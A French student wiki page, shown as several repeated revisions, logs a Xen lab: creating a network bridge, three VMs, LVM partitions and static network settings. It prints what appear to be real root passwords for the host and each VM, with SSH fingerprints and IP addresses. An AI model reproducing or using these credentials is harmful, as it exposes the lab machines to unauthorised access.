<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
==== Configuration réseau ====<br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse maxc on prend celui existant et on fait +1.<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11389
Atelier SysRes SE4 2025/2026 E5
2026-01-26T09:46:13Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
==== Configuration réseau ====<br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = ['mac=00:16:3E:8B:45:EC,bridge=pont_pacman', 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11379
Atelier SysRes SE4 2025/2026 E5
2026-01-26T08:50:23Z
<p>Cpayet : /* Etape 5 : Partition */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11372
Atelier SysRes SE4 2025/2026 E5
2026-01-26T08:11:58Z
<p>Cpayet : /* De nouveaux sur capbreton */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
